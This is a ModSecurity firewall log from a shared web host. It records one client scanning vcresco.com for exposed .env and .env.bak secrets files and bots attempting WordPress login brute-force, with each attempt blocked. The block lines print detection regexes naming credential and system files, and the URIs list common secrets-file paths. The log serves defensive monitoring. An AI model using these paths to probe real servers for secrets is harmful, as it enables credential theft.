[Tue May 26 13:04:24.383455 2026] [security2:error] [pid 485064:tid 485201] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8XgAAAIw"]
[Tue May 26 13:04:24.387910 2026] [security2:error] [pid 485064:tid 485229] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8XQAAAKg"]
[Tue May 26 13:04:24.435842 2026] [security2:error] [pid 485064:tid 485249] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8ZwAAALw"]
[Tue May 26 13:04:24.484378 2026] [security2:error] [pid 485064:tid 485198] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8cAAAAIk"]
[Tue May 26 13:04:24.580283 2026] [security2:error] [pid 485064:tid 485308] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8fQAAAPc"]
[Tue May 26 13:04:24.581132 2026] [security2:error] [pid 485064:tid 485242] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8fgAAALU"]
[Tue May 26 13:04:24.581806 2026] [security2:error] [pid 485064:tid 485266] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8fAAAAM0"]
[Tue May 26 13:04:24.582043 2026] [security2:error] [pid 485064:tid 485230] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8fwAAAKk"]
[Tue May 26 13:04:24.629992 2026] [security2:error] [pid 485064:tid 485295] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8UwAAAOo"]
[Tue May 26 13:04:24.954270 2026] [security2:error] [pid 485064:tid 485069] [remote 46.101.75.237:41508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVNAD9tlF55stOmSqH8nAAA3QQ"]
[Tue May 26 13:04:24.999546 2026] [security2:error] [pid 485064:tid 485306] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAD9tlF55stOmSqH8pgAAAPU"]
[Tue May 26 13:04:25.072951 2026] [security2:error] [pid 485064:tid 485256] [client 195.178.110.199:45650] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/public/.env"] [unique_id "ahVNAT9tlF55stOmSqH8qgAAAMM"]
[Tue May 26 13:04:25.201703 2026] [security2:error] [pid 485064:tid 485227] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAT9tlF55stOmSqH8vwAAAKY"]
[Tue May 26 13:04:25.229165 2026] [security2:error] [pid 485064:tid 485309] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAT9tlF55stOmSqH8xwAAAPg"]
[Tue May 26 13:04:25.489895 2026] [security2:error] [pid 485064:tid 485225] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAT9tlF55stOmSqH8-QAAAKQ"]
[Tue May 26 13:04:25.647955 2026] [security2:error] [pid 485064:tid 485216] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAT9tlF55stOmSqH9AgAAAJs"]
[Tue May 26 13:04:25.679436 2026] [security2:error] [pid 485064:tid 485267] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAT9tlF55stOmSqH9BQAAAM4"]
[Tue May 26 13:04:25.768730 2026] [security2:error] [pid 485064:tid 485268] [client 157.20.138.61:64377] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNAT9tlF55stOmSqH9BwAAAM8"]
[Tue May 26 13:04:25.769241 2026] [security2:error] [pid 485064:tid 485268] [client 157.20.138.61:64377] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNAT9tlF55stOmSqH9BwAAAM8"]
[Tue May 26 13:04:25.780665 2026] [security2:error] [pid 485064:tid 485282] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAT9tlF55stOmSqH9HQAAAN0"]
[Tue May 26 13:04:25.863098 2026] [security2:error] [pid 485064:tid 485229] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAT9tlF55stOmSqH9JQAAAKg"]
[Tue May 26 13:04:26.049784 2026] [security2:error] [pid 485064:tid 485211] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9MQAAAJY"]
[Tue May 26 13:04:26.137005 2026] [security2:error] [pid 485064:tid 485286] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9OgAAAOE"]
[Tue May 26 13:04:26.144054 2026] [security2:error] [pid 485064:tid 485281] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9QQAAANw"]
[Tue May 26 13:04:26.144084 2026] [security2:error] [pid 485064:tid 485253] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9QgAAAMA"]
[Tue May 26 13:04:26.221181 2026] [security2:error] [pid 485064:tid 485212] [client 195.178.110.199:45664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/s3/.env.bak"] [unique_id "ahVNAj9tlF55stOmSqH9WgAAAJc"]
[Tue May 26 13:04:26.245387 2026] [security2:error] [pid 485064:tid 485275] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9VwAAANY"]
[Tue May 26 13:04:26.290858 2026] [security2:error] [pid 485064:tid 485244] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9YAAAALc"]
[Tue May 26 13:04:26.322307 2026] [security2:error] [pid 485064:tid 485287] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9ZgAAAOI"]
[Tue May 26 13:04:26.332348 2026] [security2:error] [pid 485064:tid 485270] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9ZQAAANE"]
[Tue May 26 13:04:26.338334 2026] [security2:error] [pid 485064:tid 485318] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9aQAAAQE"]
[Tue May 26 13:04:26.394394 2026] [security2:error] [pid 485064:tid 485298] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9cQAAAO0"]
[Tue May 26 13:04:26.407027 2026] [security2:error] [pid 485064:tid 485201] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9dQAAAIw"]
[Tue May 26 13:04:26.545922 2026] [security2:error] [pid 485064:tid 485236] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9hQAAAK8"]
[Tue May 26 13:04:26.555174 2026] [security2:error] [pid 485064:tid 485227] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9hgAAAKY"]
[Tue May 26 13:04:26.560419 2026] [security2:error] [pid 485064:tid 485296] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9hwAAAOs"]
[Tue May 26 13:04:26.582850 2026] [security2:error] [pid 485064:tid 485280] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9igAAANs"]
[Tue May 26 13:04:26.590464 2026] [security2:error] [pid 485064:tid 485204] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9jQAAAI8"]
[Tue May 26 13:04:26.659264 2026] [security2:error] [pid 485064:tid 485320] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9lAAAAQM"]
[Tue May 26 13:04:26.661247 2026] [security2:error] [pid 485064:tid 485219] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9lgAAAJ4"]
[Tue May 26 13:04:26.704457 2026] [security2:error] [pid 485064:tid 485213] [client 195.178.110.199:45650] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/server/.env"] [unique_id "ahVNAj9tlF55stOmSqH9mAAAAJg"]
[Tue May 26 13:04:26.712761 2026] [security2:error] [pid 485064:tid 485225] [client 195.178.110.199:45664] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9lwAAAKQ"]
[Tue May 26 13:04:26.758813 2026] [security2:error] [pid 485064:tid 485250] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9bAAAAL0"]
[Tue May 26 13:04:26.785120 2026] [security2:error] [pid 485064:tid 485247] [client 195.178.110.199:42348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/server/backend/.env"] [unique_id "ahVNAj9tlF55stOmSqH9nAAAALo"]
[Tue May 26 13:04:26.837873 2026] [security2:error] [pid 485064:tid 485244] [client 195.178.110.199:45692] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9ogAAALc"]
[Tue May 26 13:04:26.964305 2026] [security2:error] [pid 485064:tid 485290] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9pgAAAOU"]
[Tue May 26 13:04:26.995547 2026] [security2:error] [pid 485064:tid 485282] [client 195.178.110.199:42348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/server/api/.env"] [unique_id "ahVNAj9tlF55stOmSqH9qAAAAN0"]
[Tue May 26 13:04:27.016164 2026] [security2:error] [pid 485064:tid 485274] [client 195.178.110.199:45692] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9pwAAANU"]
[Tue May 26 13:04:27.034032 2026] [security2:error] [pid 485064:tid 485284] [client 195.178.110.199:42442] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAj9tlF55stOmSqH9qgAAAN8"]
[Tue May 26 13:04:27.039141 2026] [security2:error] [pid 485064:tid 485297] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9rgAAAOw"]
[Tue May 26 13:04:27.045075 2026] [security2:error] [pid 485064:tid 485262] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9sgAAAMk"]
[Tue May 26 13:04:27.065159 2026] [security2:error] [pid 485064:tid 485201] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9tQAAAIw"]
[Tue May 26 13:04:27.072708 2026] [security2:error] [pid 485064:tid 485272] [client 195.178.110.199:42366] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9tgAAANM"]
[Tue May 26 13:04:27.075376 2026] [security2:error] [pid 485064:tid 485217] [client 195.178.110.199:45780] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/service/.env"] [unique_id "ahVNAz9tlF55stOmSqH9uwAAAJw"]
[Tue May 26 13:04:27.079257 2026] [security2:error] [pid 485064:tid 485205] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9uQAAAJA"]
[Tue May 26 13:04:27.117662 2026] [security2:error] [pid 485064:tid 485307] [client 195.178.110.199:45664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/services/.env"] [unique_id "ahVNAz9tlF55stOmSqH9vwAAAPY"]
[Tue May 26 13:04:27.148696 2026] [security2:error] [pid 485064:tid 485233] [client 195.178.110.199:45688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9wAAAAKw"]
[Tue May 26 13:04:27.150275 2026] [security2:error] [pid 485064:tid 485211] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9xQAAAJY"]
[Tue May 26 13:04:27.151802 2026] [security2:error] [pid 485064:tid 485308] [client 195.178.110.199:45538] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9yAAAAPc"]
[Tue May 26 13:04:27.174016 2026] [security2:error] [pid 485064:tid 485231] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9ywAAAKo"]
[Tue May 26 13:04:27.188773 2026] [security2:error] [pid 485064:tid 485226] [client 31.57.184.107:62726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.rabbanitradingcompany.com"] [uri "/wp-login.php"] [unique_id "ahVNAz9tlF55stOmSqH9ugAAAKU"]
[Tue May 26 13:04:27.218455 2026] [security2:error] [pid 485064:tid 485255] [client 195.178.110.199:42442] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH9zgAAAMI"]
[Tue May 26 13:04:27.225537 2026] [security2:error] [pid 485064:tid 485198] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH93QAAAIk"]
[Tue May 26 13:04:27.225577 2026] [security2:error] [pid 485064:tid 485280] [client 195.178.110.199:42450] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH91gAAANs"]
[Tue May 26 13:04:27.294328 2026] [security2:error] [pid 485064:tid 485213] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/shared/.env"] [unique_id "ahVNAz9tlF55stOmSqH-BgAAAJg"]
[Tue May 26 13:04:27.299555 2026] [security2:error] [pid 485064:tid 485238] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNAz9tlF55stOmSqH-BQAAALE"]
